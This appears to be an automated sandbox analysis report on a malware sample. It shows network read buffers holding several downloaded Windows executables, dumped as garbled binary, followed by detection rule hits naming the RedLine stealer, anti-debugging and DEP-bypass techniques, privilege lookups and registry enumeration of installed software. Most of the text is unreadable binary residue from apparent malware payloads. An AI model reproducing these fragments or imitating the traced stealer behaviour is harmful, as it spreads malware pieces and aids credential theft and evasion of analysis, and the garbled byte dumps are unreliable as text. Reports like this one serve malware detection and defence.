 buffer: MZ€ÿÿ@@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELs¸¹bà HtZ/@Í.text¡rt àžîfI"É¥îDZAFÁ¨ÄpZZ,F‘îò ·C“Up¨ öJ®>S%c†ô×ap¹è>DMÕ)°d^ò’¸MÔϘeyU¬¡ ¥4ЮôØÄ~õ^5=\3`@]¢”¼·›Š3çò‰WƒÉ½0ö†òÕùÂÞ¨bَ¯Š‰å¦¥H:²“2~ s‡ÛSyf½úԕü™¸|Àgõ…×ñ9i‘*]üAÓþçQ¡q’31Üæ§Õ9@ýeU> f°*Ï: ¹­Á¿—+WxÓî²n]wPšŸt UAŸX"·yҝçðTÙêáìèïÕk T³¢"w|]È9Áf& ѾbµÆ'À¥UpŸ½€¬HOd9Ï3ÎVÚˆáñÒ/´O_RM,Y[ê×ñ`\€0Ú÷èYRº™ ˆŽ åi¢–#~$á^‰@ó[.þt“hcꉈ½ÛåÛÕ7+èªÉµ$Ðq)-ÁP™Ì…2”+ŸÎ&tØçÚs—)(胐ÍleÒêEd7¤àIê]j¹ªçàܳ•vX‡ßy'¥³tÛw˜œ"À•!Äq§ i šª‹F«ÑSǤE3°>8©†éÍF`} Êx\jé3³!K^)[’›–Óñc”C"Οkڙ¾òGô‹—#̧‡¸Á~O2YýW;­|XVy.H“ón·í~Me…[‹{aŠó’ë(‹ÄàB7B…$î[Ýl_¤ôtua+qƒì‰<$tu”$Ÿ3ƒì‰4$ënHrh0Ã8{‹$ƒÄëëïÓèutSôÌo^ë „îoë ëõ„ ëŒ¿Ñx{Æë pakV_ëB³ëøà¬ëˆ˜Ñx{0Ъâóuty?’‹4$ƒÄut—%‹<$ƒÄÃU‰åVWë‘nëVh÷XërXëôwë ‚`ÖjKYë¯ë÷èAÿÿÿŠóK»}<»E8¹ÇañÙ2à›ÒÊi³Ñ3D6œàšÒÊÛ=Ž™+ˆÇ"00Û5"YÛÅâÛ<Ð ·‰{000Û5öÛÅØØÆÎÏÏ_^ÉÂU‰åUSVWë3Gcˆh‚XëdHëôüë3&´’lthê‹ $ƒÄë–Áëï'è¶þÿÿe»E8»M<ëÎ÷Ýðœ?†à(ðØ3 3E"ص0000ø "E7œ4"C2V¡Ã”ÆòðH)¡E:°ÊØf000Û8œÎüÆòD-ÎüÛ)J>°Ê¶ÐØ 0002Û6ÆòE5œ¶Ðœ¥¢742 9E$Ø0000ø (E9œ4(C4DV¡¦?Ý½D 0Ô¦ÙFÏÏÏÅàèØ70008øàðÑóÆïI3£œ£4âû?éómM<Û$€Uöá|X²#00»4³ô4Û5¢|ÛßOÛ=DdŒ‰Ú000Û5pÛÛÅÿØüÍÏωø_^[]ÉÂU‰åƒì SVWë 7±Eh©XëÏëôüëâÏè©Á¹’ëxÀëõèèýÿÿ»m8ð¹uÄ»}$¹1»E<»M gfgfØ2ÎÏϝ½eȹ2½e̹2½uÄùZ4X000ba`ZÏÏcLµðE%ÏEÄfØgÎÏÏ uÈE7»}$¹1Û7÷uÄ0000nogf؊ÍÏÏÛ#üfhX™$00»4³ô4Û5n Ûß Û<ù„ý‰¢000Û5yÛÅ ØÍÌÏϋEô_^[ÉÂU‰åƒì`SVWë ®G\hvXëúZëô ë äí¹në¢Æëõ˜èÂüÿÿ»m8ϹMüV¼ØVµðD3ÏuüÏcxµð?´'300¹u”½E¹f`Ïc|»6µð?´Î200½}à¹1¹I4½EèZ(fÏc ÷6(000¹Â½}à½uÀabZp`Ïc@µð?µÿ200½uÄZ2gg`ZÏZÏÏEÀÏ£°000µð?µ‚200¹MȽu€¹H4÷00`00½EœgX0008Z4`gZ6fÏcDµðEjÏE€¿uø½uŒ¹½}øZ4gZ1aggg`ZÏÏÏcHµðE½uô¹½}øZ4gZ1aggg`ÏEÄÏÏcHµðE)»EŒX4100fgÏc»u$¹¶8200ÏuȽu€»} ±ñ0010¹H4¹8½E˜gX0008Zp`gZ>fÏcDµð?µ6200³MÈ0?´Ì100ÏE€¿uø½uˆ¹½}øZ4gZ1aggg`ZÏÏÏcHµð?µå100½uð¹½}øZgZ1aggg`ÏEÄÏÏcHµð?µƒ100Ø0000E5D3 Oƒ³ô4»DÌÛ:4±ÞË&00Û5ÛÅ4Û50 äHK±öd00Û>LâêXB00iÛ5™ÛÄ¥Û= ÉëҊP00Û5x¼ÛÅÛ;æ[K¹àÛ5à¡ÛÈ|Û2ņñÒ5Û5xiäHK1òÛ5präHKðÛ1‹œÛ5|äHK1òÛ1ÀÒõÛ5¼äHK±ÂãþÛ6¸äÛ5šÛɸš»E<3?‡~6f¹Â³Mü0D8±ò8100Û6±òÈ000a»z µùD>»J<3Mˆ»B$3E<Ô³òiÒÔn³Mü0DVØ0000o±ß×'00¹É¹Ê±ñ™00±ò+(00¹:¹È5™00X100`؅ÊÏÏ»uð¹Á»eˆª00000¹É¹Ê±ñÉ00±òp(00¹:»v3uð»}ô»eĪ00000ÛQf»fe𽆐000»3Eˆ³0D»»~4³Ù8áÙ³ö8ðV™000D<Ï?003uˆ1È Ò×Ûãn»~3}ðϽu̹g`ÏEôagggggÏEÄÏ£¨000Û=XØ300Ïc,ÙáÌÏÏÛ>–¦ªìˆF%00Û5iÛÅ´Û?|n'û ‰^300Û5ŸçÛÅ8ØdÉÏÏ_^[ÉÂU‰åƒìSVWë –Â¸ëÉ»ëõ)ë .§~¹cë ,ëõjèùÿÿ»m8X¸#00Ïc,½uÌ`ÏE ÏE<cØpËÏϵðD=ÏE$ÏEÌ`cØÎËÏÏZ0ZÏÏ#Û#7‚Ú‹X+)00»4³ô4Û5s ÛßúÛ?#-xrˆµ‰S000Û5£ÂÛÅ#؊ÈÏÏ_^[ÉÂU‰åìTSVWëÆS œhÇ‹$ƒÄëØëï/ëJ”KÒh¼‹ $ƒÄëNÂëïèqøÿÿ»m8Ø0000E6D4:‘ÅnÛ:ô±Þÿ)00Û5°ÛÅô°Û5üïêHK±öd00Û<.=ù‰B00Û5ÓÛÅ\Û%€çRG5XP00»$³ô4Û5~°ÛߕÛ;¯ ¶N¹àÛ5ÜÛÈ#Û1eñÒ5Û5<=éHK1òÛ5tFéHKðÛ2òYœÛ5tTéHK1òÛ1dÒõÛ5pbéHK±ÂãþÛ6päÛ50ÛÉp0½…€ËÏÏfZ8ZÏÏclµð?´ü000½µœËÏϽ„ËÏÏ`Z$gZ)ÏÏcPµð?´000±O 000?³000½…ŒÍÏÏX4100fZ0ÏcØ000@0B0_0S0U0C0C00S0Q0\0\00S0B0U0Q0D0U0000C0000hf`gÏc`³ô<½EôZ fÏc ÷6 000Ø<000B0E0^0Q0C000h¹v<Ø:000G0]0Y0S000h¹v ¹N$Ïct¹v8fÏcXµðDÈZ0ZÏÏ#Û?D*ætX÷)00hÛ53 ÛÄÛ?c¸ ´ý¢‰Œ100Û5J•ÛÅ؅ÆÏÏ_^[ÉÂU‰åSVWëK=Œh½‹$ƒÄë»ëïýë ÇàG×jPYë¢ë÷ßè{öÿÿ»m8»E<µÆD)ð¹ÇVVµðD>`Ï£˜000³ô4V›ÛÛÛ?ˆç‘Â_X+00hÛ5êÛÄÛ?]–MZ`»<³ô4Û5!@Û”ØÆÏÏ_^[ÉÂU‰åƒìSVWëpBW*hOXëç>ëôaë¾?S×\çhŋ $ƒÄëÏ[ëïÚèéõÿÿ÷uÌ1000»m8ð»E<¹ÇgVVµðD>`Ï£˜000³ô4V›ÛÛØw000A0U0]0E0000000F0Y0B0D0Y0_000F0]0G0Q0B0U000F0R0_0H0000000H0U0^0000000000no°0D$fgÏ£000³ô8µðE7³ö>Û×Û7÷uÌ0000Û#5»›ïX,00»4³ô4Û5>xÛß!Û<eb‰õ000Û5…hÛÅcØÅÏϋEü_^[ÉÂU‰åƒìSVWë ¼¦~hVXë¡ëô?ëü»'th͋ $ƒÄë¦mëïèâôÿÿ÷uÌ1000»m8ð»E<¹Çgœ´ðD=`Ï£”000³ô4šÛÞØe000F]SYC0F]ECR]0F]]_EC0F]T]@0F]BQGT0F]]U]S0FR_HWE0FR_HCV0FR_H]_0FR_HFY0FR_HTY0FY_CUB00no°0D$fgÏ£¬000³ô8µðE7³ö7Û×Û7÷uÌ0000Û>`ù̯Xf
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@€º´ Í!¸LÍ!This program cannot be run in DOS mode. $PEL4tCÕà 08 Æ.V ` @ `@…àU K` ¨Ã@  H.text46 8  `.rsrc¨Ã` Ä: @@.reloc @þ @BV HÀQôû'´M 2J(( *{*Š8*~ž({ 8ïÿÿÿ}8äÿÿÿ{ *0w8-þ E8rps z~ž({ 8%?Þÿÿÿ8=Ñÿÿÿ8} 8*8Åÿÿÿ ~‡:ÿÿÿ& 8’ÿÿÿ{ *{ *ÚÐ#~²( Œ#~³(ƒ 98} 8*J8*} 8óÿÿÿÂ8*~ ~È(‹ 8êÿÿÿ~´(‡ 9Úÿÿÿ8Öÿÿÿ0Æ8°þ E=ó©)_5Šê)'Oj-Þl88~Ô( ~Ó( ( 8ö:X8È8Ô8¥9® 8oÿÿÿ~×(—  8Uÿÿÿ~Ò( ~Õ( "@ZY"@Z"@Z( 8~Ô( Y~Õ( ( ~c:ëþÿÿ& 8àþÿÿ9Û8ì8O87~Ô( ~Ó( ( 8~×(— 82~Ÿ({ 8Í9î ~c9kþÿÿ& 8`þÿÿ9Ÿþÿÿ8fs 8hÿÿÿ"‡C"´B~Ö(“ 8~×(— 8•ÿÿÿ9Ç8T"´B"´B~Ö(“ 8ß~Ô( "@ZY~Ó( "@Z"@Z( 8lÿÿÿ*9 8 ýÿÿ98ˆ~Ô( ~Õ( ( 8Eÿÿÿ~Ô( Y~Ó( ( ~X9@ýÿÿ& 85ýÿÿ~Ò( X~Ó( ( 8m~Ò( ~Õ( Y( 8z~Ò( ~Ó( "@Z"@Z( 8ÿ~Ò( ~Ó( X( 8Œüÿÿ8çþÿÿ8Èüÿÿ~Ô( "@ZY~Õ( "@ZY"@Z"@Z( þ83üÿÿ~Ò( X~Õ( ( 8 üÿÿ~Ô( ~Õ( Y( 8áûÿÿ~×(— 8þÿÿ8gýÿÿ8÷üÿÿ8â8ÿÿÿ"4C"´B~Ö(“  8–ûÿÿ8ûûÿÿ8~Ô( ~Õ( ( ~#:^ûÿÿ& 8Sûÿÿ8¼üÿÿ8~Ò( ~Ó( ( 8¶ûÿÿ~Ô( ~Ó( X( 8sþÿÿ~Ò( ~Ó( ( 8[ûÿÿ~Ò( ~Õ( ( ~59­úÿÿ& 8¢úÿÿ8ûÿÿ8™ÿÿÿ~Ò( ~Õ( ( 8oúÿÿ8Tüÿÿ 8`úÿÿ""´B~Ö(“ 8(ûÿÿ0Z8þ E782*}8~ž({  ~f:Ëÿÿÿ& 8Àÿÿÿ~Ø(› 8½ÿÿÿ0k8Zþ EL8G~Ù(›  ~q:×ÿÿÿ& 8Ìÿÿÿ~µ(‡ &8Éÿÿÿ~ž({ 8ßÿÿÿ*}8ãÿÿÿ0c þ8þ E&8!} ~R9Øÿÿÿ& 8Íÿÿÿ}8~Ú(› 8*0f8þ E28-}8} ~o:Ðÿÿÿ& 8Åÿÿÿ~ž({ 8~É(‹ 8*ž8~Ê(‹ 8~ž({ 8ßÿÿÿ*ž~Ë(‹ 8*{~ ({ 8êÿÿÿ0¢8pþ E*8%~ž({  ~89Øÿÿÿ& 8Íÿÿÿ~Ì(‹ 8>~Þ(Ÿ ~ß(Ÿ s }8¢ÿÿÿ~Þ(Ÿ >‘ÿÿÿ8*~ß(Ÿ >zÿÿÿ8«ÿÿÿ0´(8ryp~ñ(£ }8} 8(! þ88¶ÿÿÿþ Eš»Ñ8 /s" ~ (» 85*r‰p" As# ~ (·  ~8: ÿÿÿ& 8•ÿÿÿs$ %~(¿ %~(¿ }8d /s" ~ (» 8kÿÿÿ{þs% ~(Ç 8fÿÿÿ (~ò(§ 8a~(³ 8@ÿÿÿs& %~(à } ~#:ãþÿÿ& 8Øþÿÿryp~ñ(£ ~ú(¯ 8Lÿÿÿ~ó(« ~ù(¯  8šþÿÿ0’ þ8þ E-G8(*~( ~(Ï 8*~(Ó 8Øÿÿÿ~( ‰((&8¿ÿÿÿ~(Ë  @Ãÿÿÿ ~l9‹ÿÿÿ& 8€ÿÿÿ0*8fþ Eò;ӕ8í{Y}8~ž({ 8€{?81{?Ñÿÿÿ8¸ÿÿÿ{:{88Çÿÿÿ 8ÿÿÿ{Y} ~‡9aÿÿÿ& 8Vÿÿÿ{X}8?*{X} ~q:#ÿÿÿ& 8ÿÿÿ{ ò<8Âÿÿÿ8,ÿÿÿ87ÿÿÿ{  <ÿÿÿ 8ßþÿÿ0]8‘þ E‚‚W5
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $‘†ÕçsOÕçsOÕçsOŽwNÇçsOŽpNÞçsOŽvNeçsOŠvNçsOŠwNÚçsOŠpNÜçsOŽrNØçsOÕçrOiçsON‰zNÑçsON‰sNÔçsON‰ŒOÔçsON‰qNÔçsORichÕçsOPEd†ã!Ícð" è ²Hë €à``{X¸{Œ°øà—Àhªppª À.text¨æ è  `.rdataœ ì @@.data¬o6|@À.pdataà—˜²@@_RDATA” J@@.rsrcø°L@@.relochÀN@BHƒì(A¸ H׉H ªèsT H |Û HƒÄ(é¯× ÌÌÌHƒì(A¸ HωH P«èCT H ¼Û HƒÄ(é× ÌÌÌHƒì(A¸HÉH `«èT H üÛ HƒÄ(éO× ÌÌÌHƒì(A¸ HŸ‰H ªèãS H <Ü HƒÄ(é× ÌÌÌHƒì(A¸H—‰H  ªè³S H |Ü HƒÄ(éïÖ ÌÌÌHƒì(A¸H‰H ШèƒS H ¼Ü HƒÄ(é¿Ö ÌÌÌHƒì(E3ÀHRë H ƒªèVS H ÿÜ HƒÄ(é’Ö ÌÌÌÌÌÌHƒì(E3ÀH"ë H “ªè&S H ?Ý HƒÄ(ébÖ ÌÌÌÌÌÌHƒì(E3ÀHòê H C©èöR H Ý HƒÄ(é2Ö ÌÌÌÌÌÌHƒì(E3ÀHÂê H ó§èÆR H ¿Ý HƒÄ(éÖ ÌÌÌÌÌÌHƒì(A¸H¯ˆH ¨è“R H üÝ HƒÄ(éÏÕ ÌÌÌHƒì(A¸?H߈H 0©ècR H <Þ HƒÄ(éŸÕ ÌÌÌH ™Þ éÕ ÌÌÌÌH ùÞ é€Õ ÌÌÌÌH Yß épÕ ÌÌÌÌH ¹ß é`Õ ÌÌÌÌH à éPÕ ÌÌÌÌHƒì(E3ÀHâé H Ó§èæQ H _à HƒÄ(é"Õ ÌÌÌÌÌÌH ¹à éÕ ÌÌÌÌH á éÕ ÌÌÌÌH yá éðÔ ÌÌÌÌH Ùá éàÔ ÌÌÌÌH 9â éÐÔ Hƒì(H ‰²è$Þ H ‰â HƒÄ(é°Ô H …â é¤Ô H Õâ é˜Ô H ã éŒÔ Hƒì(H ¶èàÝ H 5ã HƒÄ(élÔ ¸ÃÌÌÌÌÌÌÌÌÌÌH‰\$H‰l$H‰t$ WAVH‹ùLç A¸L5WìÿÿL‹É@A¶AÿȄÀt'‹ÐA¶B¶„0 oB8„2 ouIÿÁIÿÂE…ÀÑAÿÈE…ÀxA¶B¶Œ0 oA¶B¶„0 o+ÈuHƒÇE3ÛL‹×H…ÿuE‹ÓëD8t fIÿÂE8uøD+×Aâÿÿÿ?A‹êH|v@L‹ A‹ÂI‹ñL‹ÇE…Òt+A¶ÿȄÒt#A¶ B¶Œ1 oB8Œ2 ou IÿÀIÿÁ…ÀÕÿȅÀxA¶B¶Œ0 oA¶B¶„0 o+Áu¶.Bö„0`dFt"AÿÃHƒÃAƒû|„3ÀH‹\$ H‹l$(H‹t$0A^_ÃH‹\$ ¸H‹l$(H‹t$0A^_ÃÌÌÌÌÌÌ̃ùwHcÁH ¹uH‹ÁÃ3ÀÃÌÌÌÌÌÌÌÌÌHƒì(ƒù w+HcÁL­ÊA‹ ‚‰ I‚A‹D‚(A‰E…Ét‰J(3ÀHƒÄ(ÃL é6A¸õ8H;¹ènT¸HƒÄ(ÃÌÌÌÌL‰L$ L‰D$AVHƒìPH‰\$`E3öH‰l$HH‹ÙH‹II‹éH‰|$8L‰|$ M‹øHcúH…ÉtÿöˆH‰t$@ƒÿ ‡H9êÿÿ‹Œº HÊÿዃLA‰‹ƒP‰ED9´$€„䋃L‰ƒPéÓH »E‰7‹D‰ED9´$€„µD‰±Dé©‹C(A‹öL‰d$0L‰l$(E‹î…À~:I‹þ„H‹C H‹L8H…ÉtD8itÿAD8iuèî\‹C(ÿÆHƒÇ ;ð|ÑE‹æ…À~tM‹þ€H‹C J‹D8H…ÀtCH‹@H‹(·°‹½¼ƒÁpùH‹H‹I@ÿ8ˆH‹Í‹ðÿ‡¯÷ðµ¼Dî‹C(AÿÄIƒÇ D;à| H‹l$xL‹|$pL‹d$0A‹þ…À~4I‹ö€H‹C H‹L0H…ÉtD8qt ƒiuèá[ÿÇHƒÆ ;{(|ÖE‰/L‹l$(D‰u錋C(A‹öD‰t$h…À~5I‹þH‹C H‹L8H…ÉtD8qtÿAD8quèÞ[‹C(ÿÆHƒÇ ;ð|ÑHL$hE‹þH‰‹ …ÀŽÆI‹î€H‹C H‹t(H…ö„’¹ ÿ›†‹È‹FTF<F$F ¯ÈL$hH‹Nÿt†D$hH‹NHÿf†D$hH‹N0ÿX†D$hH‹N`ÿJ†D$hH‹~@H…ÿtH‹WH‹ËèQÊH‹?H…ÿuìH‹~H…ÿtH‹WH‹ËèÄ?H‹?H…ÿuì‹C(AÿÇHƒÅ D;øŒIÿÿÿH‹l$xL‰³ A‹þ…À~0I‹öH‹C H‹L0H…ÉtD8qt ƒiuèqZÿÇHƒÆ ;{(|ÖH‹L$p‹D$hD‰u‰éH‹{HL$hH‰‹ A‹Æ‰D$hH…ÿtgfDH‹×H‹Ëè5cL9³ t H‹×H‹Ëè1,ë3H;»hr"H;»psH‹ƒ`H‰ÿ‹LH‰»`ëH‹ÏèL+H‹XH…ÿu£‹D$hL‰³ D‰uA‰éƒA‹ÖE‹Î9S(~FD‹œ$€M‹ÆfDH‹C J‹DH…ÀtH‹@H‹DŒ¹ÔE…ÛtD‰´¹ÔÿÂIƒÀ ;S(|ËD‰uE‰ë)D‰uL9³ A‹ÆL9³~¸A‰ëA¾H‹KL‹|$ H‹|$8H‹t$@H‹l$HH‹\$`H…Étÿ¹„A‹ÆHƒÄPA^ÃÓ.K¾TTT®ÌÌÌÌÌÌÌÌH‰L$H‰T$L‰D$L‰L$ SUVWAVH‹ÑH\$8E3ÒH-ôI@D‹3À‹{‹sD‹[H[(L‹søE…Àt,@D¶ AÿÈAö)tG €HÿÂA¾ÁH‰T$0HƒÀÐE…ÀuØ;Ç|);Æ%E…Ût¾ D;ÙuA‰AÿÂH‹T$0HÿÂH‰T$0E…Ûu‹A‹ÂA^_^][ÃÌL‹ÜI‰[I‰kVWAVHƒìp3ÿICØI‰CÈH‹òI‰{ÀIC ÇD$@;E3ÀI‰{°DOÇD$0WI‰C H‹ÙÇD$ :WÉèóþÿÿƒø…жCL5ÿHHƒÃ<:…žH„$ E3ÀH‰D$(DO;WH‰|$ HKè®þÿÿƒø…‹HƒÃ€;.u[¶KBö1tPòHÿÃòò%fD¾ÁHÿÃòYËòYÓfnÀ¶óæÀ¶ÈBö0òXÈò\ÌuÕò^Ê
request_handle: 0x00cc000c
1 1 0

InternetReadFile

 buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $,CyáCyáCyáâ~Iyáä~Ëyáå~Qyá–å~Lyá–â~Ryá–ä~byáà~FyáCyàyáØè~@yáØá~ByáØByáØã~ByáRichCyáPELå!Ícà! ތ>ð°@ Jœ<K<€øT ?p?@ð,.textVÝÞ `.rdataîaðbâ@@.dataD` D@À.rsrcø€P@@.relocTR@Bj h¨<¹phè?#hêèŒ*YÃÌÌÌj8hÌ<¹ˆhè#h`êèl*YÃÌÌÌj8hÌ<¹ hèÿ"hÀêèL*YÃÌÌÌj8hÌ<¹¸hèß"h ëè,*YÃÌÌÌj8h=¹Ðhè¿"h€ëè *YÃÌÌÌj0hD=¹èhèŸ"hàëèì)YÃÌÌÌj0hx=¹iè"h@ìèÌ)YÃÌÌÌh€h°=¹iè\"h ìè©)YÃj?h€>¹0iè?"híèŒ)YÃÌÌ̋ÁÂÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèÂ2ƒÄ‹Æ^]ÂÌÌ̋I¸|<…ÉEÁÃÌÌU‹ìV‹ñFÇ”ñPèó2ƒÄöEt j Vè«%ƒÄ‹Æ^]AÇ”ñPèÉ2YÃÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌWÀ‹ÁfÖAÇA<ÇìñÃÌÌÌÌÌÌÌÌU‹ìƒì MôèÒÿÿÿhˆJEôPè›2ÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPèò1ƒÄÇìñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìV‹ñWÀFPÇ”ñf֋EƒÀPè²1ƒÄÇ ñ‹Æ^]ÂÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹ZVWQS‹ñè‹=€h3É3À‰}ü…Û~53Ò;NjþEЃ=„h¸phCphƒ~r‹>ŠˆA‹}üB;Ë|˃~r‹_Æ‹Æ^[‹å]Ã_Æ‹Æ^[‹å]ÃÌÌÌÌÌU‹ìƒìSVW‹ò‹ùQ‰}ô‹FP‰Eðè“3ۉ]ø9]ðŽ)Dƒ~‹Ær‹¾Pè¯KƒÄ…Àu-‹N‹Æƒùr‹€< t‹Æƒùr‹ƒ‹Ïr‹Šé̃~‹Ær‹‹=@i3ҋ Di…ÿt+ŠˆEÿfDŠ]ÿƒù¸0iC0i8‹]øtB;×ráƒÊÿ‹E‹Èƒxr‹3À…ÿt.Š ˆMÿDƒ=Di¹0iŠ]ÿC 0i8‹]øt@;Çr݃Èÿƒ=Di¹0iC 0i‰Mì‹Mô‰Møƒyr‹ ‰Mø‹Ï+ȍ 3Ò÷÷‹Mì‹}ôŠ ‹MøˆC‰]ø;]ðŒÜþÿÿƒr‹Æ‹Ç_^[‹å]ÃÆ‹Ç_^[‹å]ÃÌÌÌÌÌÌÌÌÌÌU‹ìƒì@SVW‹Ù‹òQMĉ]ôèçýÿÿEċÖPMÜèYþÿÿhÇCÇCÆè°"‹Ø¹ƒÈÿ‰]ø‹ûƒÄ ó«3Ò„¾Š8>‰‹Bƒú@|ð‹Uì3ö3ۍ~ø…ÒtA‹Møƒ}ðEÜCEܾ‹ƒøÿt'ÁæðƒÇx‹Ï‹ÆÓø‹MôPè‹Uìƒï‹MøC;Úr‹Eø…ÀthPèð!ƒÄ‹Uðƒúr(‹MÜB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwVRQèÀ!ƒÄ‹UØÇEìÇEðÆE܃úr(‹MÄB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQè~!ƒÄ‹Eô_^[‹å]Ãè›GÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì4‹E0SVW3ÿÆEè¾…À„‹]ÇEàÇEäÆEÐ;Ç‚´+ǍMÐ;ÃB؃}4E CE SÇPèƒþr.‹MèV‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡hRQè× ƒÄMЃ}Uó~EàEèCUƒ}ä‹uà‹]f~ÉMèCÁfÖEø;óu\ƒîr‹; uƒÀƒÂƒîsïƒþü„îŠ: u7ƒþý„ߊH:Ju&ƒþþ„ΊH:Juƒþÿ„½Š@:B„±‹E0G‹uü;ø‚õþÿÿ3ÿ‹Uƒþr/‹MèF‹Áþr‹IüƒÆ#+ÁƒÀüƒø‡’VQè ‹UƒÄ‹Eƒør'H‹Âùr‹RüƒÁ#+ƒÀüƒøw`QRèσċU4ÇEÇEÆEƒúr3‹M B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwë ‹uüGéWÿÿÿRQ肃ċÇ_^[‹å]Ãè Eè«ÌÌÌÌÌÌÌÌÌÌÌU‹ìQS‹]V‹ñ‰]üWjhÀ>ÇFÇFÆèD3ÿ…Û~1ƒ}ECEŠ8S¿C €ú¶È¶ÃGȶÁ‹ÎPèG;}ü|ϋUƒúr(‹MB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèуÄ_‹Æ^[‹å]ÃèïDÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌU‹ìƒì0VWj$hÄ>MÐÇEàÇEäÆEÐè—‹E…Àu3öéÇ3ÿ…À„¸ÇEøÇEüÆEè;Ç‚F+ǹ;ÁBȃ}ECEQǍMèPèBƒìEЋÌPètƒìEè‹ôƒì‹ÌPèa‹ÎèªþÿÿƒÄè¢üÿÿ‹UüƒÄ0…À„šƒúr,‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒø‡¹RQèǃċEG;ø‚Hÿÿÿ¾‹Uäƒúr(‹MÐB‹Áúr‹IüƒÂ#+ÁƒÀüƒøwxRQ膃ċUƒúr^‹MB‹ÁúrF‹IüƒÂ#+ÁƒÀüƒøwHë4ƒúr(‹MèB‹Áúr‹IüƒÂ#+ÁƒÀüƒøw#RQè1ƒÄ3öétÿÿÿRQè ƒÄ_‹Æ^‹å]Ãè?CèJÌÌÌÌÌÌÌÌÌÌU‹ìQ‹E‹U‹MV…À„‚S@WPè] ƒÄMƒ}‹Ø‹ÓCM+ъIˆD ÿ„Àuó‹óNŠF„Àuù+ñFVjÿðV‹øSWÿðPèÇ5ƒÄ WÿðjÿñÿñWjÿñÿ ñ‹U‹M_[^ƒúr%B‹Áúr‹IüƒÂ#+ÁƒÀüƒøwRQèAƒÄ‹å]ÃèdBÌÌÌÌU‹ìƒì$SVW‹ùjÇGÇGÆÿñ…À„‡j ÿ$ñ‹Ø‰]ü…Û„lSÿð‰Eô…À„SjjjjjÿPjhéýÿ ð‹ð‰uø…öŽ.‹WN;Êw‰O‹Çƒr‹ÆëF‹G‹Ù+Ú+Â;Øw%ƒ‹Ç‰Or‹S4jVèE,ÆƒÄ ‹uøëQSÆEø‹ÏÿuøS訋]üƒ‹Çr‹jjVPjÿÿuô
request_handle: 0x00cc000c
1 1 0
section {u'size_of_data': u'0x000eae00', u'virtual_address': u'0x0000c000', u'entropy': 7.94412795068915, u'name': u'.rsrc', u'virtual_size': u'0x000eb000'} entropy 7.94412795069 description A section with a high entropy has been found
entropy 0.966563786008 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Communications smtp rule Network_SMTP_dotNet
description PWS Memory rule Generic_PWS_Memory_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description RedLine stealer rule RedLine_Stealer_m_Zero
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description RedLine stealer rule RedLine_Stealer_m_Zero
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
base_handle: 0x80000002
key_handle: 0x00000394
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
1 0 0

RegOpenKeyExW

 regkey_r: 7-Zip
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip
1 0 0

RegOpenKeyExW

 regkey_r: AddressBook
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook
1 0 0

RegOpenKeyExW

 regkey_r: Adobe AIR
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR
1 0 0

RegOpenKeyExW

 regkey_r: Connection Manager
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager
1 0 0

RegOpenKeyExW

 regkey_r: DirectDrawEx
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx
1 0 0

RegOpenKeyExW

 regkey_r: EditPlus
base_handle: 0x00000394
key_handle: 0x00000398
options: 0
access: 0x00020019
